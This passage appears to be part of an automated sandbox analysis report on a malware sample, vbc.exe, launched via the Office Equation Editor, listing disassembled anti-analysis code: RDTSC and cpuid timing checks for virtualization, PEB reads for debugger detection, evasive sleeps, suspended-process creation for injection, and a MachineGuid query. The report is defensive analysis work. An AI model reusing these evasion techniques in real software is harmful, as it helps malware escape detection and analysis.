Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002A8DB2 second address: 00000000002A8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002A8DFF second address: 00000000002A8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F03A0E2C8FFh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002A7A0D second address: 00000000002A7A0D instructions:
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002A01BE second address: 00000000002A01BE instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002A70C1 second address: 00000000002A70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002A8DB2 second address: 00000000002A8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002A8DFF second address: 00000000002A8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F03A0E2C8FFh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002A7A0D second address: 00000000002A7A0D instructions:
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A54E7 rdtsc 6_2_002A54E7
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2280 Thread sleep time: -60000s >= -30000s Jump to behavior

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A54E7 rdtsc 6_2_002A54E7
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A50CA mov eax, dword ptr fs:[00000030h] 6_2_002A50CA
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2958 mov eax, dword ptr fs:[00000030h] 6_2_002A2958
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A71A9 mov eax, dword ptr fs:[00000030h] 6_2_002A71A9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A6B93 mov eax, dword ptr fs:[00000030h] 6_2_002A6B93
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A341B mov eax, dword ptr fs:[00000030h] 6_2_002A341B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A7D52 mov eax, dword ptr fs:[00000030h] 6_2_002A7D52

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: vbc.exe, 00000006.00000002.2365906619.0000000000880000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2365906619.0000000000880000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2365906619.0000000000880000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2183 cpuid 6_2_002A2183
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs